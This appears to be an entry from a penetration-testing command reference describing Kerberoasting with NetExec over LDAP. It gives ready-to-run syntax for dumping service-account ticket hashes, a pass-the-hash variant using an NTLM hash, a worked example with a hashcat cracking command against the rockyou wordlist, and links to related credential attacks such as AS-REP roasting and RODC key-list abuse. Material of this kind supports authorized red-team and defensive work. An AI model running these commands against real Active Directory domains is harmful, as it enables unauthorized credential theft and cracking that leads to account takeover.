NetExec LDAP Kerberoasting
Request TGS tickets for every account with a SPN and write hashes to a file ready for hashcat (-m 13100). Performed entirely over LDAP+Kerberos in a single command, no separate GetUserSPNs invocation needed.
- Tool
- nxc
- Category
- Credential Attacks / Kerberoasting
- Platform
- linux
- Requires
- password
- Protocols
- LDAP, KERBEROS
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc ldap <dc-ip> -u <user> -p <password> --kerberoasting <output.txt>
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
nxc ldap <dc-ip> -u <user> -H <hash> --kerberoasting <output.txt>
Filter by SPN OU requires password
nxc ldap <dc-ip> -u <user> -p <password> --kerberoasting <output.txt> --kdcHost <dc-fqdn>
Examples
nxc ldap 10.10.10.10 -u jdoe -p 'Password123!' --kerberoasting kerb.txt
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt
Tags
References
Related commands
- Impacket AS-REP Roast AS-REP Roasting for accounts without Kerberos Pre-Authentication
- Impacket Get TGT Get TGT to be used in Kerberos authentication
- Impacket Kerberoast Extract service account hashes via Kerberoasting
- Impacket KeyListAttack Abuse RODC (Read-Only DC) credential caching to retrieve hashes for accounts cached on…
- Impacket Targeted Kerberoast Request a TGS only for a specific service account instead of every kerberoastable user…
- NetExec LDAP AS-REP Roasting Request AS-REP responses for every account with DONT_REQ_PREAUTH set and write hashes to…
- NetExec LDAP Pre-Windows 2000 Accounts Enumerate pre-Windows 2000 compatible computer accounts that use the hostname as password
- NetExec SMB Timeroast Exploit NTP to request hashes for computer accounts without a password (Timeroasting)